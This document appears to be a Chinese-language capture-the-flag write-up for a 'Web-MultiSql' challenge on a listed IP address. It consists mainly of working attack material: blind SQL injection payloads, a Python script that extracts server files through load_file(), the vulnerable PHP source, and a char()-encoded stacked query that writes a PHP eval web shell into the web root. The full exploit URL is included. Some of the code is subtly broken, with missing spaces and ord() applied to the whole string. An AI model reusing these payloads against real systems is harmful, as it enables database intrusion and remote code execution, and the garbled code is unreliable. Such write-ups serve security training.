Web-MultiSql

http://62.234.99.204:1005/

页面存在注入点

http://62.234.99.204:1005/user/user.php?id=1^if(ascii(mid(user(),1,1))>120,1,0)

http://62.234.99.204:1005/user/user.php?id=1^if(ascii(mid(load_file(0x2F7661722F7777772F68746D6C2F757365722F757365722E706870),1,1))=120,1,0)

Load_file()读文件/var/www/html/user/user.php(路径16进制转码)

import requests

importmultiprocessing

import time

def runn(a,b):

  r= requests.session()

  headers ={'cookie':'PHPSESSID=r5i6l86as0l78pn3qttjp9b8v3'}

  out=''

  for i in range(a,b):

    for j in range(32,128):

     #/var/www/html//bwvs_config/sys_config.php

      #url = 'http://62.234.99.204:1005/user/user.php?id=1^if(ascii(mid(load_file(0x2F7661722F7777772F68746D6C2F2F627776735F636F6E6669672F7379735F636F6E6669672E706870),%d,1))=%d,0,1)'%(i,j)

      url = 'http://62.234.99.204:1005/user/user.php?id=1^if(ascii(mid(load_file(0x2F7661722F7777772F68746D6C2F757365722F757365722E706870),%d,1))=%d,0,1)'%(i,j)  #/var/www/html/user/user.php

      #url = 'http://62.234.99.204:1005/user/user.php?id=1^if(ascii(mid(user(),%d,1))=%d,0,1)'%(i,j)

      respond = r.get(url,headers =headers).text

      if 'admin' in respond:

        out+=chr(j)

        #print(url)

        print(out)

if __name__ =='__main__':

    runn(0,10)

/var/www/html/user/user.php内容如下：

<?

phpinclude_once('../bwvs_config/sys_config.php');

  if (isset($_SESSION['user_name']))

  {

    include_once('../header.php');

    if (!isset($SESSION['user_id']))

    {

      $sql = "SELECT * FROMdwvs_user_message WHERE DWVS_user_name="."'{$_SESSION['user_name']}'";

      $data = mysqli_query($connect,$sql) ordie('Mysql Error!!');

      $result = mysqli_fetch_array($data);

      $_SESSION['user_id'] =$result['DWVS_user_id'];}

      $html_avatar =htmlspecialchars($_SESSION['user_favicon']);

      if(isset($_GET['id']))

      {

        $id=waf($_GET['id']);

        $sql = "SELECT * FROMdwvs_user_message WHERE DWVS_user_id =".$id;

        $data = mysqli_multi_query($connect,$sql) or die();

        $result =mysqli_store_result($connect);

        $row = mysqli_fetch_row($result);

        echo'<h1>user_id:'.$row[0]."</h1><br><h2>user_name:".$row[1]."</h2><br><h3>".$row[4]."</h3>";

        mysqli_free_result($result);die();

      }

     mysqli_close($connect);

mysqli_multi_query（）函数执行多条sql语句

使用char()绕过

strs='''select"<?php eval($_POST['a']);echo 'aaaaaaa'; ?>" into outfile'/var/www/html/favicon/TZDX.php';'''

print(strs)

len_str=len(strs)

for i inrange(0,len_str):

ifi == 0:

print('char(%s'%ord(strs),end="")

else:

print(',%s'%ord(strs),end="")

print(')')

注意POST['a']  a要用引号，不然连不上。

payload

set@sql=char(115,101,108,101,99,116,32,34,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,39,97,39,93,41,59,101,99,104,111,32,39,97,97,97,97,97,97,97,39,59,32,63,62,34,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,84,90,68,88,46,112,104,112,39,59);preparequery from @sql;execute query;

完整的URL=http://62.234.99.204:1005/user/user.php?id=790;set@sql=char(115,101,108,101,99,116,32,34,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,39,97,39,93,41,59,101,99,104,111,32,39,97,97,97,97,97,97,97,39,59,32,63,62,34,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,84,90,68,88,46,112,104,112,39,59);preparequery from @sql;execute query;